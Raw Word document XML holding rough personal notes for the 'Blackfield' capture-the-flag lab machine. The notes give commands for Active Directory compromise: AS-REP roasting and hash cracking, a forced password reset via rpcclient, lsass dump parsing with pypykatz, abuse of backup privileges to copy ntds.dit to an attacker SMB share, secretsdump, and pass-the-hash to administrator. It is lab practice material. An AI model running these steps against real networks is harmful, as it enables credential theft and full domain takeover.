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7BAE328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284F9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blackfield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4507C0E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8174F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> It’s a hard machine where </w:t>
      </w:r>
      <w:r w:rsidR="000A0A88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I obtain the knowledge of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A0A88"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 w:rsidR="000A0A88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. How its work and what’s syntax’s we can use to set the file into the shell.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7149C819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E36D5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36D5A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E36D5A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E36D5A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E36D5A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E36D5A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E36D5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36D5A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3D7CB05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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="7DEE8C26" w:rsidR="00843DCE" w:rsidRDefault="00CA44D8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-shares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‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A26E0" w14:textId="39FFA92B" w:rsidR="00CA44D8" w:rsidRDefault="00CA44D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we notice profiles$ is read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2277C8" w14:textId="0D106D6A" w:rsidR="00CA44D8" w:rsidRDefault="00CA44D8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‘//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/profiles$’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A5FFF" w14:textId="1AB961E4" w:rsidR="00CA44D8" w:rsidRDefault="00155D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obtain all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DD7CA" w14:textId="16068035" w:rsidR="00155DAA" w:rsidRDefault="00155D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mount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‘//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/profiles$’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</w:p>
    <w:p w14:paraId="1D5540AC" w14:textId="258B2A73" w:rsidR="00155DAA" w:rsidRDefault="00155D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</w:p>
    <w:p w14:paraId="76A3561A" w14:textId="501469E0" w:rsidR="00155DAA" w:rsidRDefault="00155D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 -al = we obtain all the directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="20256977" w:rsidR="00843DCE" w:rsidRDefault="00BF615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777554">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls &gt; /Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00777554">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="588FFF46" w14:textId="2A35191E" w:rsidR="00127294" w:rsidRDefault="00BF615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downloads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Lastex version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+x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main_folder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5603D20" w14:textId="5393EB8C" w:rsidR="00127294" w:rsidRDefault="002E0C6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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC2EE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30DDCE7" w14:textId="18F3D59F" w:rsidR="00DC2EE9" w:rsidRDefault="00DC2EE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userenum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-dc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-d backfield -o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kerbrute.userenum.out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users.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="096CE3B0" w14:textId="38A107BF" w:rsidR="00B00227" w:rsidRDefault="00B0022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the audit2020@backfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F911AF4" w14:textId="617C3BF9" w:rsidR="00B00227" w:rsidRDefault="00B0022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that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-shares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‘’ at the output forensic/audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25175366" w14:textId="69547B92" w:rsidR="00330E31" w:rsidRDefault="00330E3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check authentication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kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04BD4111" w14:textId="69158BBE" w:rsidR="00330E31" w:rsidRDefault="001F7D1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can do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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/doc/python3-impacket/examples/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4B2B7" w14:textId="056DEAC6" w:rsidR="001F7D16" w:rsidRDefault="001F7D1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./GetNPUsers.py -dc-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-no-pass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userfile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user.lst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blackfield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</w:p>
    <w:p w14:paraId="3F01C21D" w14:textId="17043CD3" w:rsidR="00330E31" w:rsidRDefault="001F556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copy that hash and paste to the file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qqq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0701D220" w14:textId="3CC681E1" w:rsidR="001F5565" w:rsidRDefault="001F556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starting some words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A7D0B" w14:textId="3CFD8DB8" w:rsidR="001F5565" w:rsidRDefault="001F556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hsahcat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–example-hashes | grep -B5 paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12419F27" w14:textId="7B3CDCFF" w:rsidR="001F5565" w:rsidRDefault="00F419B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18200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qqq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/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AC760" w14:textId="5D8C6C6C" w:rsidR="004D2878" w:rsidRDefault="00F419B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18200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qqq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-show</w:t>
      </w:r>
      <w:r w:rsidR="004D2878">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = #00^BlackKnight</w:t>
      </w:r>
      <w:r w:rsidR="008A0CDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1E640" w14:textId="2C6A9D4E" w:rsidR="008A0CDD" w:rsidRDefault="00E50B2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448AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E448AE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- -shares -u support -p ‘paste’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A056646" w14:textId="04C27FA8" w:rsidR="001F5565" w:rsidRDefault="0078495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done and we notice that we can read profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A20207B" w14:textId="4B0079EB" w:rsidR="00784951" w:rsidRDefault="00784951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mount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-o ‘username=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support,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=paste’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/profiles$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</w:p>
    <w:p w14:paraId="30E44F0F" w14:textId="6FE93E39" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3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but its empty </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73531B42" w14:textId="3202D4B1" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3C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rpcclient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support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520847C" w14:textId="241EEFB7" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3C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enumdomusers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copy all and paste to the file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ppp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="710D1352" w14:textId="6129B4CA" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3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ppp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| awk -F’\[‘ ‘{print $2}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DE327" w14:textId="16510C73" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3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just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just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full 2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coloum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now to remove something from that </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18099834" w14:textId="7CFB4879" w:rsidR="00F41B3C" w:rsidRDefault="00F41B3C" w:rsidP="00F41B3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ppp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| awk -F’\[‘ ‘{print $2}’ | awk -F ‘\]’ ‘{print $1}’</w:t>
      </w:r>
      <w:r w:rsidR="009B5358">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009B5358">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A919611" w14:textId="3B2E944E" w:rsidR="00F41B3C" w:rsidRDefault="00544E72" w:rsidP="00F41B3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bloodhound.py -u support -p ‘paste’ -d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blackfield.local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 all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76977E63" w14:textId="088C89A9" w:rsidR="00F41B3C" w:rsidRDefault="00F7184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we remove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then also its okey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A21B393" w14:textId="77777777" w:rsidR="00AD4BBC" w:rsidRDefault="00AD4BBC" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B171267" w14:textId="77777777" w:rsidR="00AD4BBC" w:rsidRDefault="00AD4BBC" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463DB2D2" w14:textId="77777777" w:rsidR="00AD4BBC" w:rsidRDefault="00AD4BBC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2760A969" w:rsidR="00843DCE" w:rsidRDefault="006B3CA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 has no code.</w:t>
      </w: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39F040D1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Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AC76E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neo4j start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01AB98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bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D209799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mark support user as own</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766496F4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for audit2020 and click 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shorest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path from here via right click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C000EB2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rpcclient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support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79408679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create the password of the audit2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B73B88F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rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="617C0F4D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setuserinfo2 Audit2020 23 ‘password@’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63F681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rpcclient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password change command so we can obtain it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4A487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Audit2020 -p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passowrd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@’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58BE04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can see that we see the forensic option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E534E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mount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-o ‘username=audit2020,password=password@’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/forensic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</w:p>
    <w:p w14:paraId="604EA57C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memory_analysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="442F7132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lsass.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B165B43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lsass.zip ~/home/kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7F9D9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unzip lsass.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8D1DF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pypykatz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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B984243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pypykatz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lsa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minidump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lsass.DMP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&gt;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lsass.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B32CD8B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less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lsass.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17043919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grep NT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lsass.out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-B3 | grep -I username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F2144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that 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sve_backup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administrator so obtain NT of both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177BF57D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svc_backup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paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09857057" w14:textId="77777777" w:rsidR="008174F2" w:rsidRDefault="008174F2" w:rsidP="008174F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svc_backup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 paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="73EE083C" w:rsidR="00843DCE" w:rsidRDefault="008174F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user.txt may be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15D85D59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/all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881D2F6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that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SeBackupPrivilege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SeRestorePrivilege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is enabled so when we search on google talk we find that wbadmin.exe so we can do it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786E09D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our terminal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mkdir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777smb and cd into it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63B82F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smbserver.py -smb2suppport -user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-password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pasword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sentdata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$(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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089DB20D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24C4616F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 use x: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="005A19A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\our_ip\sentdata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usr:bhavya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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDAA875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start backup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backuptarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\\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sentdata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include:c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:\windows\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</w:p>
    <w:p w14:paraId="0B7D4EC6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echo y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start backup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backuptarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\\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sentdata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include:c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:\windows\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</w:p>
    <w:p w14:paraId="6143B33B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notice that the folder is work with NTFS. so now we create in our terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3FCC33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dd if=/dev/zero of=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ntfs.disk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bs=1024M count=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389C4B4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losetup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ntfs.disk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="274BF0C1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losetup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-a = we notice /dev/loop0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FDAE8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mkfs.ntfs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/dev/loop0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DB200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mount /dev/loop0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</w:p>
    <w:p w14:paraId="5C827AEC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mount | grep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copy the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2902C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smbserver.py -smb2suppport -user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-password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pasword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sentdata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$(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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215192B2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echo y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start backup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backuptarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\\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sentdata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include:c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:\windows\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>\ = still it cannot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51757EAB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23895551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/samba/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smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="669ACD2E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from the downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE45DC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systemctl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restart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smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D8AF532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6ED44B3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 :x /delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17715016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 x: \\our_ip\dentdata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A1349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echo y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start backup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backuptarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\\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sentdata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include:c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:\windows\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</w:p>
    <w:p w14:paraId="1062D9AC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at that terminal ls -al we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WindowsImagesBackup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B456298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 use x: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005A19A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\our_ip\dentdata</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FE42327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 x: /delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E258961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x:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21140B9B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mkdir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test1 cd test1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E0A16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mkdir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test2 cd test2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA59A20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again at c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1696F0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notice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windowimagebackup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has dc01 if not run again </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">echo y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start backup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backuptarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\\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sentdata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include:c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:\windows\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</w:p>
    <w:p w14:paraId="53A962CF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dc01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24406F13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backupxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56F1F781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shell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get versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0F445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echo Y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wbadmin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start recovery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version:paste_our_version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iteamtype:file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iteam:C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:\windows\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ntds.dit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recoverytarget:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\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notrestoreacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E97BDD3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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A41C9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downloads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ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="779A98DA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reg save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hklm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system.hive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00E6E56D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download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system.hive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34FC2E63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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C50C0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secretsdump.py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ntds.dit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system.hive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LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702B15A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secretsdump.py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ntds.dit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system.hive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-history LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A9287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obtain the administrator with hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B40DCD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psexec.py -hashes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fullhashwith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administrator@ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44823342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notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F5573F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we see the password is been with encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20F7C8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cipher /c root.txt = to encrypt the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEA314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but we see this can be done by the administrator. and we are authority\system by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</w:p>
    <w:p w14:paraId="3D52ED90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exit form it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170891A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wmiexec.py -hashes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pastewith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administrator@ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4548717A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>= we are administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073636A8" w14:textId="77777777" w:rsidR="00C52CB1" w:rsidRDefault="00C52CB1" w:rsidP="00C52CB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type root.txt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0AEAA2E5" w:rsidR="00A311DF" w:rsidRPr="00C52CB1" w:rsidRDefault="00C52CB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root with crack the encryption</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00C52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0C1D"/>
    <w:rsid w:val="00012908"/>
    <w:rsid w:val="0007284B"/>
    <w:rsid w:val="00074AF7"/>
    <w:rsid w:val="000770A5"/>
    <w:rsid w:val="000A0A88"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000D55C4"/>
    <w:rsid w:val="00127294"/>
    <w:rsid w:val="00155DAA"/>
    <w:rsid w:val="00157382"/>
    <w:rsid w:val="001877FB"/>
    <w:rsid w:val="001B503C"/>
    <w:rsid w:val="001C58C7"/>
    <w:rsid w:val="001C77BD"/>
    <w:rsid w:val="001E568A"/>
    <w:rsid w:val="001F5565"/>
    <w:rsid w:val="001F7D16"/>
    <w:rsid w:val="00232192"/>
    <w:rsid w:val="00235478"/>
    <w:rsid w:val="002408D4"/>
    <w:rsid w:val="00245B56"/>
    <w:rsid w:val="0025523B"/>
    <w:rsid w:val="00284F9A"/>
    <w:rsid w:val="002E0C62"/>
    <w:rsid w:val="003159E7"/>
    <w:rsid w:val="00330E31"/>
    <w:rsid w:val="003479F7"/>
    <w:rsid w:val="003675D7"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00492749"/>
    <w:rsid w:val="004D2878"/>
    <w:rsid w:val="004E48F7"/>
    <w:rsid w:val="004F1E37"/>
    <w:rsid w:val="00516762"/>
    <w:rsid w:val="005203C9"/>
    <w:rsid w:val="005307A5"/>
    <w:rsid w:val="00535F8F"/>
    <w:rsid w:val="00541245"/>
    <w:rsid w:val="00544E72"/>
    <w:rsid w:val="00554D98"/>
    <w:rsid w:val="005E3FE0"/>
    <w:rsid w:val="0063201F"/>
    <w:rsid w:val="006537AE"/>
    <w:rsid w:val="00675D08"/>
    <w:rsid w:val="006A3573"/>
    <w:rsid w:val="006B3CAB"/>
    <w:rsid w:val="006F489E"/>
    <w:rsid w:val="00700DD9"/>
    <w:rsid w:val="00777554"/>
    <w:rsid w:val="00784951"/>
    <w:rsid w:val="0078690E"/>
    <w:rsid w:val="007A710D"/>
    <w:rsid w:val="008174F2"/>
    <w:rsid w:val="00827E63"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00860682"/>
    <w:rsid w:val="00873C0F"/>
    <w:rsid w:val="008A0CDD"/>
    <w:rsid w:val="00966114"/>
    <w:rsid w:val="009B5358"/>
    <w:rsid w:val="009C32BD"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AD4BBC"/>
    <w:rsid w:val="00B00227"/>
    <w:rsid w:val="00B142DA"/>
    <w:rsid w:val="00B76779"/>
    <w:rsid w:val="00BA5359"/>
    <w:rsid w:val="00BF2E13"/>
    <w:rsid w:val="00BF366D"/>
    <w:rsid w:val="00BF6154"/>
    <w:rsid w:val="00C270E6"/>
    <w:rsid w:val="00C27243"/>
    <w:rsid w:val="00C52CB1"/>
    <w:rsid w:val="00CA44D8"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CF0F7F"/>
    <w:rsid w:val="00CF67A1"/>
    <w:rsid w:val="00D334D1"/>
    <w:rsid w:val="00DC2EE9"/>
    <w:rsid w:val="00DD7FE9"/>
    <w:rsid w:val="00DF43D9"/>
    <w:rsid w:val="00E36D5A"/>
    <w:rsid w:val="00E448AE"/>
    <w:rsid w:val="00E50B26"/>
    <w:rsid w:val="00E77DBE"/>
    <w:rsid w:val="00E85F75"/>
    <w:rsid w:val="00E867FE"/>
    <w:rsid w:val="00ED041E"/>
    <w:rsid w:val="00F01251"/>
    <w:rsid w:val="00F1332F"/>
    <w:rsid w:val="00F419B4"/>
    <w:rsid w:val="00F41B3C"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F71849"/>
    <w:rsid w:val="00FA138D"/>
    <w:rsid w:val="00FA4FB5"/>
    <w:rsid w:val="00FF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8C7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\\our_ip\dentdata" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\our_ip\sent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5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90</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T16:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>